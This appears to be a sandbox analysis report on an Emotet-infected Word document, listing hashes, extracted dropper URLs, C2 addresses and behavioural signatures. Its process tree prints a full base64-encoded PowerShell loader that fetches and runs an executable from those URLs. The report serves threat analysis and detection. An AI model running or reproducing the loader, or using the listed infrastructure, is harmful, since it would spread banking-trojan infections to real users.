Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    58s
  • max time network
    62s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17/07/2020, 19:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    065b3683b05c18ddd776602b6e7cbefb234aaecbada86dd61f1855184620b192.doc

  • Size

    190KB

  • MD5

    e80c1c2d615086180413bebad8ad811c

  • SHA1

    8647826b19dc88ff8a58e0d103a2848ab015823a

  • SHA256

    065b3683b05c18ddd776602b6e7cbefb234aaecbada86dd61f1855184620b192

  • SHA512

    d9ac58e806cbac223770a515e88c7eb4acb5b2ce56e765ceb5eb99d65ecf21dbc8a1e251f2a2469a115e842a9deef117abdf63fb2ba06a73210f088753405378

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
exe.dropper

http://defensacovid.com/wp-admin/dGzIMVvo/
exe.dropper

http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/
exe.dropper

http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/
exe.dropper

http://karir-up.com/wp-admin/CCzj96yk23/

Extracted

Family

emotet

C2

177.144.130.105:443

198.27.69.201:8080

157.7.164.178:8081

78.188.170.128:80

203.153.216.178:7080

77.74.78.80:443

178.33.167.120:8080

177.0.241.28:80

143.95.101.72:8080

51.38.201.19:7080

181.167.35.84:80

41.185.29.128:8080

192.163.221.191:8080

181.164.110.7:80

203.153.216.182:7080

80.211.32.88:8080

113.160.180.109:80

185.142.236.163:443

192.241.220.183:8080

87.106.231.60:8080
rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Modifies registry class 280 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Executes dropped EXE 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\065b3683b05c18ddd776602b6e7cbefb234aaecbada86dd61f1855184620b192.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1344
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQByAGAASQBUAFkAYABwAHIATwB0AE8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABjAGUAdQBkAGoAdQBqACAAPQAgACcAOQA5ADcAJwA7ACQAcQB1AHUAdQB2AGoAbwBlAGwAYgBlAGEAawB6AGUAbwBwAGcAdQB2AG4AbwBhAGQAPQAnAG0AbwBlAHEAdQB2AGUAbwB0AGgAcABhAHUAcgBqAGUAZQBjACcAOwAkAG4AaQBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjAGUAdQBkAGoAdQBqACsAJwAuAGUAeABlACcAOwAkAHIAaQBlAHkAZgBvAGUAeQBoAG8AdQBjAGYAbwBlAG0APQAnAHkAdQBhAHcAbQBlAG8AbABkAG8AaQB6AGQAYQBqACcAOwAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAGIAYwBsAEkARQBOAHQAOwAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYwBhAG4ALgB0AHIAaQAtAGMAbwBtAG0AYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AQgBtAEsATwBlAHkAYwBtADAANwAwADQALwAqAGgAdAB0AHAAOgAvAC8AZABlAGYAZQBuAHMAYQBjAG8AdgBpAGQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGQARwB6AEkATQBWAHYAbwAvACoAaAB0AHQAcAA6AC8ALwBkAG8AbwByAGIAaABhAGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAcQA2AEsAZABvAGkAcwBrADEAcgA0ADAANgAwADQANQAzAC8AKgBoAHQAdABwADoALwAvAGEAZwBpAGwAZQBuAHQAZwBhAG0AZQAuAHIAZQB2AGkAZQB3AHMAaABlAGwAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGMAcwBvAGEANAA1AGcAdwA1ADEAMwAxADUAOQAzADUALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAaQByAC0AdQBwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBDAEMAegBqADkANgB5AGsAMgAzAC8AJwAuACIAUwBgAHAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABtAGEAaQBiAD0AJwBkAG8AdQB5AGMAaAB1AGEAcwBsAGUAbwB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJAByAGEAbwBiAHoAZQB1AHgAIABpAG4AIAAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgApAHsAdAByAHkAewAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsALgAiAEQATwBXAG4AYABsAE8AQQBgAEQAZgBgAGkATABlACIAKAAkAHIAYQBvAGIAegBlAHUAeAAsACAAJABuAGkAYgApADsAJAB0AGgAbwBhAGsAdABhAGUAaAB6AGUAcgB0AG8AeABkAHUAYQB4AHcAZQBvAHgAPQAnAHYAZQBhAHEAdQB0AGgAaQBhAGMAdABoAGkAZQB3AHQAaABhAHUAawB0AGgAbwBvAG4AaABpAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABuAGkAYgApAC4AIgBsAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwAwADcAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAZQBgAEEAVABFACIAKAAkAG4AaQBiACkAOwAkAHkAZQBqAGsAaQBvAG0AawBhAHUAeQB6AG8AaAA9ACcAdABpAGUAYgAnADsAYgByAGUAYQBrADsAJAB0AGgAbwBvAHcAcgBhAHUAdABkAHUAZwA9ACcAaABvAHUAdAB3AGkAbwBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBvAGkAbQBjAGEAbwBuAGoAbwBhAGQAeQBpAGEAdgBqAG8AYQBoAHoAdQB1AGwAPQAnAHkAdQB1AG4AbQBvAGYAJwA=
    1⤵
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    PID:1536
  • C:\Users\Admin\997.exe
    C:\Users\Admin\997.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:1860
    • C:\Windows\SysWOW64\SrpUxNativeSnapIn\KBDBU.exe
      "C:\Windows\SysWOW64\SrpUxNativeSnapIn\KBDBU.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: EmotetMutantsSpam
      • Executes dropped EXE
      PID:1748

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1344-5-0x000000000BE40000-0x000000000BE44000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1344-6-0x0000000007010000-0x0000000007210000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1344-7-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1344-2-0x0000000008A40000-0x0000000008A44000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1344-4-0x000000000ADC0000-0x000000000ADC4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1344-3-0x0000000007010000-0x0000000007210000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1748-13-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1748-14-0x0000000000400000-0x0000000000448000-memory.dmp

    Filesize

    288KB

    Download

  • memory/1860-10-0x00000000003C0000-0x00000000003CC000-memory.dmp

    Filesize

    48KB

    Download